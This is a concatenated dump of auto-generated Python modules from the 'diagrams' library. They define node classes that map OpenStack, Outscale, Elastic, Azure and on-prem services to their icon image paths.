import _OpenStack class _Workloadprovisioning(_OpenStack): _type = "workloadprovisioning" _icon_dir = "resources/openstack/workloadprovisioning" class Magnum(_Workloadprovisioning): _icon = "magnum.png" class Sahara(_Workloadprovisioning): _icon = "sahara.png" class Trove(_Workloadprovisioning): _icon = "trove.png" # Aliases File: diagrams/openstack/monitoring.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _OpenStack class _Monitoring(_OpenStack): _type = "monitoring" _icon_dir = "resources/openstack/monitoring" class Monasca(_Monitoring): _icon = "monasca.png" class Telemetry(_Monitoring): _icon = "telemetry.png" # Aliases File: diagrams/openstack/lifecyclemanagement.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _OpenStack class _Lifecyclemanagement(_OpenStack): _type = "lifecyclemanagement" _icon_dir = "resources/openstack/lifecyclemanagement" # Aliases File: diagrams/openstack/baremetal.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _OpenStack class _Baremetal(_OpenStack): _type = "baremetal" _icon_dir = "resources/openstack/baremetal" class Cyborg(_Baremetal): _icon = "cyborg.png" class Ironic(_Baremetal): _icon = "ironic.png" # Aliases File: diagrams/openstack/optimization.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _OpenStack class _Optimization(_OpenStack): _type = "optimization" _icon_dir = "resources/openstack/optimization" class Congress(_Optimization): _icon = "congress.png" class Rally(_Optimization): _icon = "rally.png" class Vitrage(_Optimization): _icon = "vitrage.png" class Watcher(_Optimization): _icon = "watcher.png" # Aliases File: diagrams/openstack/frontend.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _OpenStack class _Frontend(_OpenStack): _type = "frontend" _icon_dir = "resources/openstack/frontend" class Horizon(_Frontend): _icon = "horizon.png" # Aliases File: diagrams/openstack/__init__.py """ Openstack provides a set of general OpenStack services. """ from diagrams import Node class _OpenStack(Node): _provider = "openstack" _icon_dir = "resources/openstack" fontcolor = "#ffffff" File: diagrams/openstack/orchestration.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _OpenStack class _Orchestration(_OpenStack): _type = "orchestration" _icon_dir = "resources/openstack/orchestration" class Blazar(_Orchestration): _icon = "blazar.png" class Heat(_Orchestration): _icon = "heat.png" class Mistral(_Orchestration): _icon = "mistral.png" class Senlin(_Orchestration): _icon = "senlin.png" class Zaqar(_Orchestration): _icon = "zaqar.png" # Aliases File: diagrams/openstack/operations.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _OpenStack class _Operations(_OpenStack): _type = "operations" _icon_dir = "resources/openstack/operations" # Aliases File: diagrams/openstack/nfv.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _OpenStack class _NFV(_OpenStack): _type = "nfv" _icon_dir = "resources/openstack/nfv" class Tacker(_NFV): _icon = "tacker.png" # Aliases File: diagrams/openstack/networking.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _OpenStack class _Networking(_OpenStack): _type = "networking" _icon_dir = "resources/openstack/networking" class Designate(_Networking): _icon = "designate.png" class Neutron(_Networking): _icon = "neutron.png" class Octavia(_Networking): _icon = "octavia.png" # Aliases File: diagrams/openstack/packaging.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _OpenStack class _Packaging(_OpenStack): _type = "packaging" _icon_dir = "resources/openstack/packaging" class LOCI(_Packaging): _icon = "loci.png" class Puppet(_Packaging): _icon = "puppet.png" class RPM(_Packaging): _icon = "rpm.png" # Aliases File: diagrams/openstack/storage.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _OpenStack class _Storage(_OpenStack): _type = "storage" _icon_dir = "resources/openstack/storage" class Cinder(_Storage): _icon = "cinder.png" class Manila(_Storage): _icon = "manila.png" class Swift(_Storage): _icon = "swift.png" # Aliases File: diagrams/openstack/adjacentenablers.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _OpenStack class _Adjacentenablers(_OpenStack): _type = "adjacentenablers" _icon_dir = "resources/openstack/adjacentenablers" # Aliases File: diagrams/openstack/apiproxies.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _OpenStack class _Apiproxies(_OpenStack): _type = "apiproxies" _icon_dir = "resources/openstack/apiproxies" class EC2API(_Apiproxies): _icon = "ec2api.png" # Aliases File: diagrams/openstack/applicationlifecycle.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _OpenStack class _Applicationlifecycle(_OpenStack): _type = "applicationlifecycle" _icon_dir = "resources/openstack/applicationlifecycle" class Freezer(_Applicationlifecycle): _icon = "freezer.png" class Masakari(_Applicationlifecycle): _icon = "masakari.png" class Murano(_Applicationlifecycle): _icon = "murano.png" class Solum(_Applicationlifecycle): _icon = "solum.png" # Aliases File: diagrams/openstack/multiregion.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _OpenStack class _Multiregion(_OpenStack): _type = "multiregion" _icon_dir = "resources/openstack/multiregion" class Tricircle(_Multiregion): _icon = "tricircle.png" # Aliases File: diagrams/openstack/compute.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _OpenStack class _Compute(_OpenStack): _type = "compute" _icon_dir = "resources/openstack/compute" class Nova(_Compute): _icon = "nova.png" class Qinling(_Compute): _icon = "qinling.png" class Zun(_Compute): _icon = "zun.png" # Aliases File: diagrams/outscale/security.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _Outscale class _Security(_Outscale): _type = "security" _icon_dir = "resources/outscale/security" class Firewall(_Security): _icon = "firewall.png" class IdentityAndAccessManagement(_Security): _icon = "identity-and-access-management.png" # Aliases File: diagrams/outscale/__init__.py from diagrams import Node class _Outscale(Node): _provider = "outscale" _icon_dir = "resources/outscale" fontcolor = "#ffffff" File: diagrams/outscale/storage.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _Outscale class _Storage(_Outscale): _type = "storage" _icon_dir = "resources/outscale/storage" class SimpleStorageService(_Storage): _icon = "simple-storage-service.png" class Storage(_Storage): _icon = "storage.png" # Aliases File: diagrams/outscale/network.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _Outscale class _Network(_Outscale): _type = "network" _icon_dir = "resources/outscale/network" class ClientVpn(_Network): _icon = "client-vpn.png" class InternetService(_Network): _icon = "internet-service.png" class LoadBalancer(_Network): _icon = "load-balancer.png" class NatService(_Network): _icon = "nat-service.png" class Net(_Network): _icon = "net.png" class SiteToSiteVpng(_Network): _icon = "site-to-site-vpng.png" # Aliases File: diagrams/outscale/compute.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _Outscale class _Compute(_Outscale): _type = "compute" _icon_dir = "resources/outscale/compute" class Compute(_Compute): _icon = "compute.png" class DirectConnect(_Compute): _icon = "direct-connect.png" # Aliases File: diagrams/elastic/elasticsearch.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _Elastic class _Elasticsearch(_Elastic): _type = "elasticsearch" _icon_dir = "resources/elastic/elasticsearch" class Alerting(_Elasticsearch): _icon = "alerting.png" class Beats(_Elasticsearch): _icon = "beats.png" class Elasticsearch(_Elasticsearch): _icon = "elasticsearch.png" class Kibana(_Elasticsearch): _icon = "kibana.png" class LogstashPipeline(_Elasticsearch): _icon = "logstash-pipeline.png" class Logstash(_Elasticsearch): _icon = "logstash.png" class MachineLearning(_Elasticsearch): _icon = "machine-learning.png" class MapServices(_Elasticsearch): _icon = "map-services.png" class Maps(_Elasticsearch): _icon = "maps.png" class Monitoring(_Elasticsearch): _icon = "monitoring.png" class SearchableSnapshots(_Elasticsearch): _icon = "searchable-snapshots.png" class SecuritySettings(_Elasticsearch): _icon = "security-settings.png" class SQL(_Elasticsearch): _icon = "sql.png" class Stack(_Elasticsearch): _icon = "stack.png" # Aliases ElasticSearch = Elasticsearch LogStash = Logstash ML = MachineLearning File: diagrams/elastic/security.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _Elastic class _Security(_Elastic): _type = "security" _icon_dir = "resources/elastic/security" class Endpoint(_Security): _icon = "endpoint.png" class Security(_Security): _icon = "security.png" class SIEM(_Security): _icon = "siem.png" class Xdr(_Security): _icon = "xdr.png" # Aliases File: diagrams/elastic/saas.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _Elastic class _Saas(_Elastic): _type = "saas" _icon_dir = "resources/elastic/saas" class Cloud(_Saas): _icon = "cloud.png" class Elastic(_Saas): _icon = "elastic.png" # Aliases File: diagrams/elastic/__init__.py """ Elastic provides a set of general elastic services. """ from diagrams import Node class _Elastic(Node): _provider = "elastic" _icon_dir = "resources/elastic" fontcolor = "#ffffff" File: diagrams/elastic/observability.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _Elastic class _Observability(_Elastic): _type = "observability" _icon_dir = "resources/elastic/observability" class APM(_Observability): _icon = "apm.png" class Logs(_Observability): _icon = "logs.png" class Metrics(_Observability): _icon = "metrics.png" class Observability(_Observability): _icon = "observability.png" class Uptime(_Observability): _icon = "uptime.png" # Aliases File: diagrams/elastic/orchestration.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _Elastic class _Orchestration(_Elastic): _type = "orchestration" _icon_dir = "resources/elastic/orchestration" class ECE(_Orchestration): _icon = "ece.png" class ECK(_Orchestration): _icon = "eck.png" # Aliases File: diagrams/elastic/beats.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _Elastic class _Beats(_Elastic): _type = "beats" _icon_dir = "resources/elastic/beats" class APM(_Beats): _icon = "apm.png" class Auditbeat(_Beats): _icon = "auditbeat.png" class Filebeat(_Beats): _icon = "filebeat.png" class Functionbeat(_Beats): _icon = "functionbeat.png" class Heartbeat(_Beats): _icon = "heartbeat.png" class Metricbeat(_Beats): _icon = "metricbeat.png" class Packetbeat(_Beats): _icon = "packetbeat.png" class Winlogbeat(_Beats): _icon = "winlogbeat.png" # Aliases File: diagrams/elastic/agent.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _Elastic class _Agent(_Elastic): _type = "agent" _icon_dir = "resources/elastic/agent" class Agent(_Agent): _icon = "agent.png" class Endpoint(_Agent): _icon = "endpoint.png" class Fleet(_Agent): _icon = "fleet.png" class Integrations(_Agent): _icon = "integrations.png" # Aliases File: diagrams/elastic/enterprisesearch.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _Elastic class _Enterprisesearch(_Elastic): _type = "enterprisesearch" _icon_dir = "resources/elastic/enterprisesearch" class AppSearch(_Enterprisesearch): _icon = "app-search.png" class Crawler(_Enterprisesearch): _icon = "crawler.png" class EnterpriseSearch(_Enterprisesearch): _icon = "enterprise-search.png" class SiteSearch(_Enterprisesearch): _icon = "site-search.png" class WorkplaceSearch(_Enterprisesearch): _icon = "workplace-search.png" # Aliases File: diagrams/azure/web.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _Azure class _Web(_Azure): _type = "web" _icon_dir = "resources/azure/web" class APIConnections(_Web): _icon = "api-connections.png" class AppServiceCertificates(_Web): _icon = "app-service-certificates.png" class AppServiceDomains(_Web): _icon = "app-service-domains.png" class AppServiceEnvironments(_Web): _icon = "app-service-environments.png" class AppServicePlans(_Web): _icon = "app-service-plans.png" class AppServices(_Web): _icon = "app-services.png" class MediaServices(_Web): _icon = "media-services.png" class NotificationHubNamespaces(_Web): _icon = "notification-hub-namespaces.png" class Search(_Web): _icon = "search.png" class Signalr(_Web): _icon = "signalr.png" # Aliases File: diagrams/azure/database.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _Azure class _Database(_Azure): _type = "database" _icon_dir = "resources/azure/database" class BlobStorage(_Database): _icon = "blob-storage.png" class CacheForRedis(_Database): _icon = "cache-for-redis.png" class CosmosDb(_Database): _icon = "cosmos-db.png" class DataExplorerClusters(_Database): _icon = "data-explorer-clusters.png" class DataFactory(_Database): _icon = "data-factory.png" class DataLake(_Database): _icon = "data-lake.png" class DatabaseForMariadbServers(_Database): _icon = "database-for-mariadb-servers.png" class DatabaseForMysqlServers(_Database): _icon = "database-for-mysql-servers.png" class DatabaseForPostgresqlServers(_Database): _icon = "database-for-postgresql-servers.png" class ElasticDatabasePools(_Database): _icon = "elastic-database-pools.png" class ElasticJobAgents(_Database): _icon = "elastic-job-agents.png" class InstancePools(_Database): _icon = "instance-pools.png" class ManagedDatabases(_Database): _icon = "managed-databases.png" class SQLDatabases(_Database): _icon = "sql-databases.png" class SQLDatawarehouse(_Database): _icon = "sql-datawarehouse.png" class SQLManagedInstances(_Database): _icon = "sql-managed-instances.png" class SQLServerStretchDatabases(_Database): _icon = "sql-server-stretch-databases.png" class SQLServers(_Database): _icon = "sql-servers.png" class SQLVM(_Database): _icon = "sql-vm.png" class SQL(_Database): _icon = "sql.png" class SsisLiftAndShiftIr(_Database): _icon = "ssis-lift-and-shift-ir.png" class SynapseAnalytics(_Database): _icon = "synapse-analytics.png" class VirtualClusters(_Database): _icon = "virtual-clusters.png" class VirtualDatacenter(_Database): _icon = "virtual-datacenter.png" # Aliases File: diagrams/azure/security.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _Azure class _Security(_Azure): _type = "security" _icon_dir = "resources/azure/security" class ApplicationSecurityGroups(_Security): _icon = "application-security-groups.png" class ConditionalAccess(_Security): _icon = "conditional-access.png" class Defender(_Security): _icon = "defender.png" class ExtendedSecurityUpdates(_Security): _icon = "extended-security-updates.png" class KeyVaults(_Security): _icon = "key-vaults.png" class SecurityCenter(_Security): _icon = "security-center.png" class Sentinel(_Security): _icon = "sentinel.png" # Aliases File: diagrams/azure/mobile.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _Azure class _Mobile(_Azure): _type = "mobile" _icon_dir = "resources/azure/mobile" class AppServiceMobile(_Mobile): _icon = "app-service-mobile.png" class MobileEngagement(_Mobile): _icon = "mobile-engagement.png" class NotificationHubs(_Mobile): _icon = "notification-hubs.png" # Aliases File: diagrams/azure/__init__.py """ Azure provides a set of services for Microsoft Azure provider. """ from diagrams import Node class _Azure(Node): _provider = "azure" _icon_dir = "resources/azure" fontcolor = "#ffffff" File: diagrams/azure/devops.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _Azure class _Devops(_Azure): _type = "devops" _icon_dir = "resources/azure/devops" class ApplicationInsights(_Devops): _icon = "application-insights.png" class Artifacts(_Devops): _icon = "artifacts.png" class Boards(_Devops): _icon = "boards.png" class Devops(_Devops): _icon = "devops.png" class DevtestLabs(_Devops): _icon = "devtest-labs.png" class LabServices(_Devops): _icon = "lab-services.png" class Pipelines(_Devops): _icon = "pipelines.png" class Repos(_Devops): _icon = "repos.png" class TestPlans(_Devops): _icon = "test-plans.png" # Aliases File: diagrams/azure/integration.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _Azure class _Integration(_Azure): _type = "integration" _icon_dir = "resources/azure/integration" class APIForFhir(_Integration): _icon = "api-for-fhir.png" class APIManagement(_Integration): _icon = "api-management.png" class AppConfiguration(_Integration): _icon = "app-configuration.png" class DataCatalog(_Integration): _icon = "data-catalog.png" class EventGridDomains(_Integration): _icon = "event-grid-domains.png" class EventGridSubscriptions(_Integration): _icon = "event-grid-subscriptions.png" class EventGridTopics(_Integration): _icon = "event-grid-topics.png" class IntegrationAccounts(_Integration): _icon = "integration-accounts.png" class IntegrationServiceEnvironments(_Integration): _icon = "integration-service-environments.png" class LogicAppsCustomConnector(_Integration): _icon = "logic-apps-custom-connector.png" class LogicApps(_Integration): _icon = "logic-apps.png" class PartnerTopic(_Integration): _icon = "partner-topic.png" class SendgridAccounts(_Integration): _icon = "sendgrid-accounts.png" class ServiceBusRelays(_Integration): _icon = "service-bus-relays.png" class ServiceBus(_Integration): _icon = "service-bus.png" class ServiceCatalogManagedApplicationDefinitions(_Integration): _icon = "service-catalog-managed-application-definitions.png" class SoftwareAsAService(_Integration): _icon = "software-as-a-service.png" class StorsimpleDeviceManagers(_Integration): _icon = "storsimple-device-managers.png" class SystemTopic(_Integration): _icon = "system-topic.png" # Aliases File: diagrams/azure/ml.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _Azure class _Ml(_Azure): _type = "ml" _icon_dir = "resources/azure/ml" class BatchAI(_Ml): _icon = "batch-ai.png" class BotServices(_Ml): _icon = "bot-services.png" class CognitiveServices(_Ml): _icon = "cognitive-services.png" class GenomicsAccounts(_Ml): _icon = "genomics-accounts.png" class MachineLearningServiceWorkspaces(_Ml): _icon = "machine-learning-service-workspaces.png" class MachineLearningStudioWebServicePlans(_Ml): _icon = "machine-learning-studio-web-service-plans.png" class MachineLearningStudioWebServices(_Ml): _icon = "machine-learning-studio-web-services.png" class MachineLearningStudioWorkspaces(_Ml): _icon = "machine-learning-studio-workspaces.png" # Aliases File: diagrams/azure/storage.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _Azure class _Storage(_Azure): _type = "storage" _icon_dir = "resources/azure/storage" class ArchiveStorage(_Storage): _icon = "archive-storage.png" class Azurefxtedgefiler(_Storage): _icon = "azurefxtedgefiler.png" class BlobStorage(_Storage): _icon = "blob-storage.png" class DataBoxEdgeDataBoxGateway(_Storage): _icon = "data-box-edge-data-box-gateway.png" class DataBox(_Storage): _icon = "data-box.png" class DataLakeStorage(_Storage): _icon = "data-lake-storage.png" class GeneralStorage(_Storage): _icon = "general-storage.png" class NetappFiles(_Storage): _icon = "netapp-files.png" class QueuesStorage(_Storage): _icon = "queues-storage.png" class StorageAccountsClassic(_Storage): _icon = "storage-accounts-classic.png" class StorageAccounts(_Storage): _icon = "storage-accounts.png" class StorageExplorer(_Storage): _icon = "storage-explorer.png" class StorageSyncServices(_Storage): _icon = "storage-sync-services.png" class StorsimpleDataManagers(_Storage): _icon = "storsimple-data-managers.png" class StorsimpleDeviceManagers(_Storage): _icon = "storsimple-device-managers.png" class TableStorage(_Storage): _icon = "table-storage.png" # Aliases File: diagrams/azure/network.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _Azure class _Network(_Azure): _type = "network" _icon_dir = "resources/azure/network" class ApplicationGateway(_Network): _icon = "application-gateway.png" class ApplicationSecurityGroups(_Network): _icon = "application-security-groups.png" class CDNProfiles(_Network): _icon = "cdn-profiles.png" class Connections(_Network): _icon = "connections.png" class DDOSProtectionPlans(_Network): _icon = "ddos-protection-plans.png" class DNSPrivateZones(_Network): _icon = "dns-private-zones.png" class DNSZones(_Network): _icon = "dns-zones.png" class ExpressrouteCircuits(_Network): _icon = "expressroute-circuits.png" class Firewall(_Network): _icon = "firewall.png" class FrontDoors(_Network): _icon = "front-doors.png" class LoadBalancers(_Network): _icon = "load-balancers.png" class LocalNetworkGateways(_Network): _icon = "local-network-gateways.png" class NetworkInterfaces(_Network): _icon = "network-interfaces.png" class NetworkSecurityGroupsClassic(_Network): _icon = "network-security-groups-classic.png" class NetworkWatcher(_Network): _icon = "network-watcher.png" class OnPremisesDataGateways(_Network): _icon = "on-premises-data-gateways.png" class PrivateEndpoint(_Network): _icon = "private-endpoint.png" class PublicIpAddresses(_Network): _icon = "public-ip-addresses.png" class ReservedIpAddressesClassic(_Network): _icon = "reserved-ip-addresses-classic.png" class RouteFilters(_Network): _icon = "route-filters.png" class RouteTables(_Network): _icon = "route-tables.png" class ServiceEndpointPolicies(_Network): _icon = "service-endpoint-policies.png" class Subnets(_Network): _icon = "subnets.png" class TrafficManagerProfiles(_Network): _icon = "traffic-manager-profiles.png" class VirtualNetworkClassic(_Network): _icon = "virtual-network-classic.png" class VirtualNetworkGateways(_Network): _icon = "virtual-network-gateways.png" class VirtualNetworks(_Network): _icon = "virtual-networks.png" class VirtualWans(_Network): _icon = "virtual-wans.png" # Aliases File: diagrams/azure/analytics.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _Azure class _Analytics(_Azure): _type = "analytics" _icon_dir = "resources/azure/analytics" class AnalysisServices(_Analytics): _icon = "analysis-services.png" class DataExplorerClusters(_Analytics): _icon = "data-explorer-clusters.png" class DataFactories(_Analytics): _icon = "data-factories.png" class DataLakeAnalytics(_Analytics): _icon = "data-lake-analytics.png" class DataLakeStoreGen1(_Analytics): _icon = "data-lake-store-gen1.png" class Databricks(_Analytics): _icon = "databricks.png" class EventHubClusters(_Analytics): _icon = "event-hub-clusters.png" class EventHubs(_Analytics): _icon = "event-hubs.png" class Hdinsightclusters(_Analytics): _icon = "hdinsightclusters.png" class LogAnalyticsWorkspaces(_Analytics): _icon = "log-analytics-workspaces.png" class StreamAnalyticsJobs(_Analytics): _icon = "stream-analytics-jobs.png" class SynapseAnalytics(_Analytics): _icon = "synapse-analytics.png" # Aliases File: diagrams/azure/migration.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _Azure class _Migration(_Azure): _type = "migration" _icon_dir = "resources/azure/migration" class DataBoxEdge(_Migration): _icon = "data-box-edge.png" class DataBox(_Migration): _icon = "data-box.png" class DatabaseMigrationServices(_Migration): _icon = "database-migration-services.png" class MigrationProjects(_Migration): _icon = "migration-projects.png" class RecoveryServicesVaults(_Migration): _icon = "recovery-services-vaults.png" # Aliases File: diagrams/azure/identity.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _Azure class _Identity(_Azure): _type = "identity" _icon_dir = "resources/azure/identity" class AccessReview(_Identity): _icon = "access-review.png" class ActiveDirectoryConnectHealth(_Identity): _icon = "active-directory-connect-health.png" class ActiveDirectory(_Identity): _icon = "active-directory.png" class ADB2C(_Identity): _icon = "ad-b2c.png" class ADDomainServices(_Identity): _icon = "ad-domain-services.png" class ADIdentityProtection(_Identity): _icon = "ad-identity-protection.png" class ADPrivilegedIdentityManagement(_Identity): _icon = "ad-privileged-identity-management.png" class AppRegistrations(_Identity): _icon = "app-registrations.png" class ConditionalAccess(_Identity): _icon = "conditional-access.png" class EnterpriseApplications(_Identity): _icon = "enterprise-applications.png" class Groups(_Identity): _icon = "groups.png" class IdentityGovernance(_Identity): _icon = "identity-governance.png" class InformationProtection(_Identity): _icon = "information-protection.png" class ManagedIdentities(_Identity): _icon = "managed-identities.png" class Users(_Identity): _icon = "users.png" # Aliases File: diagrams/azure/iot.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _Azure class _Iot(_Azure): _type = "iot" _icon_dir = "resources/azure/iot" class DeviceProvisioningServices(_Iot): _icon = "device-provisioning-services.png" class DigitalTwins(_Iot): _icon = "digital-twins.png" class IotCentralApplications(_Iot): _icon = "iot-central-applications.png" class IotHubSecurity(_Iot): _icon = "iot-hub-security.png" class IotHub(_Iot): _icon = "iot-hub.png" class Maps(_Iot): _icon = "maps.png" class Sphere(_Iot): _icon = "sphere.png" class TimeSeriesInsightsEnvironments(_Iot): _icon = "time-series-insights-environments.png" class TimeSeriesInsightsEventsSources(_Iot): _icon = "time-series-insights-events-sources.png" class Windows10IotCoreServices(_Iot): _icon = "windows-10-iot-core-services.png" # Aliases File: diagrams/azure/general.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _Azure class _General(_Azure): _type = "general" _icon_dir = "resources/azure/general" class Allresources(_General): _icon = "allresources.png" class Azurehome(_General): _icon = "azurehome.png" class Developertools(_General): _icon = "developertools.png" class Helpsupport(_General): _icon = "helpsupport.png" class Information(_General): _icon = "information.png" class Managementgroups(_General): _icon = "managementgroups.png" class Marketplace(_General): _icon = "marketplace.png" class Quickstartcenter(_General): _icon = "quickstartcenter.png" class Recent(_General): _icon = "recent.png" class Reservations(_General): _icon = "reservations.png" class Resource(_General): _icon = "resource.png" class Resourcegroups(_General): _icon = "resourcegroups.png" class Servicehealth(_General): _icon = "servicehealth.png" class Shareddashboard(_General): _icon = "shareddashboard.png" class Subscriptions(_General): _icon = "subscriptions.png" class Support(_General): _icon = "support.png" class Supportrequests(_General): _icon = "supportrequests.png" class Tag(_General): _icon = "tag.png" class Tags(_General): _icon = "tags.png" class Templates(_General): _icon = "templates.png" class Twousericon(_General): _icon = "twousericon.png" class Userhealthicon(_General): _icon = "userhealthicon.png" class Usericon(_General): _icon = "usericon.png" class Userprivacy(_General): _icon = "userprivacy.png" class Userresource(_General): _icon = "userresource.png" class Whatsnew(_General): _icon = "whatsnew.png" # Aliases File: diagrams/azure/compute.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _Azure class _Compute(_Azure): _type = "compute" _icon_dir = "resources/azure/compute" class AppServices(_Compute): _icon = "app-services.png" class AutomanagedVM(_Compute): _icon = "automanaged-vm.png" class AvailabilitySets(_Compute): _icon = "availability-sets.png" class BatchAccounts(_Compute): _icon = "batch-accounts.png" class CitrixVirtualDesktopsEssentials(_Compute): _icon = "citrix-virtual-desktops-essentials.png" class CloudServicesClassic(_Compute): _icon = "cloud-services-classic.png" class CloudServices(_Compute): _icon = "cloud-services.png" class CloudsimpleVirtualMachines(_Compute): _icon = "cloudsimple-virtual-machines.png" class ContainerApps(_Compute): _icon = "container-apps.png" class ContainerInstances(_Compute): _icon = "container-instances.png" class ContainerRegistries(_Compute): _icon = "container-registries.png" class DiskEncryptionSets(_Compute): _icon = "disk-encryption-sets.png" class DiskSnapshots(_Compute): _icon = "disk-snapshots.png" class Disks(_Compute): _icon = "disks.png" class FunctionApps(_Compute): _icon = "function-apps.png" class ImageDefinitions(_Compute): _icon = "image-definitions.png" class ImageVersions(_Compute): _icon = "image-versions.png" class KubernetesServices(_Compute): _icon = "kubernetes-services.png" class MeshApplications(_Compute): _icon = "mesh-applications.png" class OsImages(_Compute): _icon = "os-images.png" class SAPHANAOnAzure(_Compute): _icon = "sap-hana-on-azure.png" class ServiceFabricClusters(_Compute): _icon = "service-fabric-clusters.png" class SharedImageGalleries(_Compute): _icon = "shared-image-galleries.png" class SpringCloud(_Compute): _icon = "spring-cloud.png" class VMClassic(_Compute): _icon = "vm-classic.png" class VMImages(_Compute): _icon = "vm-images.png" class VMLinux(_Compute): _icon = "vm-linux.png" class VMScaleSet(_Compute): _icon = "vm-scale-set.png" class VMWindows(_Compute): _icon = "vm-windows.png" class VM(_Compute): _icon = "vm.png" class Workspaces(_Compute): _icon = "workspaces.png" # Aliases ACR = ContainerRegistries AKS = KubernetesServices VMSS = VMScaleSet File: diagrams/onprem/queue.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _OnPrem class _Queue(_OnPrem): _type = "queue" _icon_dir = "resources/onprem/queue" class Activemq(_Queue): _icon = "activemq.png" class Celery(_Queue): _icon = "celery.png" class Emqx(_Queue): _icon = "emqx.png" class Kafka(_Queue): _icon = "kafka.png" class Nats(_Queue): _icon = "nats.png" class Rabbitmq(_Queue): _icon = "rabbitmq.png" class Zeromq(_Queue): _icon = "zeromq.png" # Aliases ActiveMQ = Activemq EMQX = Emqx RabbitMQ = Rabbitmq ZeroMQ = Zeromq File: diagrams/onprem/auth.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _OnPrem class _Auth(_OnPrem): _type = "auth" _icon_dir = "resources/onprem/auth" class Boundary(_Auth): _icon = "boundary.png" class BuzzfeedSso(_Auth): _icon = "buzzfeed-sso.png" class Oauth2Proxy(_Auth): _icon = "oauth2-proxy.png" # Aliases File: diagrams/onprem/etl.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _OnPrem class _Etl(_OnPrem): _type = "etl" _icon_dir = "resources/onprem/etl" class Embulk(_Etl): _icon = "embulk.png" # Aliases File: diagrams/onprem/logging.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _OnPrem class _Logging(_OnPrem): _type = "logging" _icon_dir = "resources/onprem/logging" class Fluentbit(_Logging): _icon = "fluentbit.png" class Graylog(_Logging): _icon = "graylog.png" class Loki(_Logging): _icon = "loki.png" class Rsyslog(_Logging): _icon = "rsyslog.png" class SyslogNg(_Logging): _icon = "syslog-ng.png" # Aliases FluentBit = Fluentbit RSyslog = Rsyslog File: diagrams/onprem/tracing.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _OnPrem class _Tracing(_OnPrem): _type = "tracing" _icon_dir = "resources/onprem/tracing" class Jaeger(_Tracing): _icon = "jaeger.png" class Tempo(_Tracing): _icon = "tempo.png" # Aliases File: diagrams/onprem/dns.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _OnPrem class _Dns(_OnPrem): _type = "dns" _icon_dir = "resources/onprem/dns" class Coredns(_Dns): _icon = "coredns.png" class Powerdns(_Dns): _icon = "powerdns.png" # Aliases File: diagrams/onprem/gitops.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _OnPrem class _Gitops(_OnPrem): _type = "gitops" _icon_dir = "resources/onprem/gitops" class Argocd(_Gitops): _icon = "argocd.png" class Flagger(_Gitops): _icon = "flagger.png" class Flux(_Gitops): _icon = "flux.png" # Aliases ArgoCD = Argocd File: diagrams/onprem/aggregator.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _OnPrem class _Aggregator(_OnPrem): _type = "aggregator" _icon_dir = "resources/onprem/aggregator" class Fluentd(_Aggregator): _icon = "fluentd.png" class Vector(_Aggregator): _icon = "vector.png" # Aliases File: diagrams/onprem/registry.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _OnPrem class _Registry(_OnPrem): _type = "registry" _icon_dir = "resources/onprem/registry" class Harbor(_Registry): _icon = "harbor.png" class Jfrog(_Registry): _icon = "jfrog.png" # Aliases File: diagrams/onprem/ci.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _OnPrem class _Ci(_OnPrem): _type = "ci" _icon_dir = "resources/onprem/ci" class Circleci(_Ci): _icon = "circleci.png" class Concourseci(_Ci): _icon = "concourseci.png" class Droneci(_Ci): _icon = "droneci.png" class GithubActions(_Ci): _icon = "github-actions.png" class Gitlabci(_Ci): _icon = "gitlabci.png" class Jenkins(_Ci): _icon = "jenkins.png" class Teamcity(_Ci): _icon = "teamcity.png" class Travisci(_Ci): _icon = "travisci.png" class Zuulci(_Ci): _icon = "zuulci.png" # Aliases 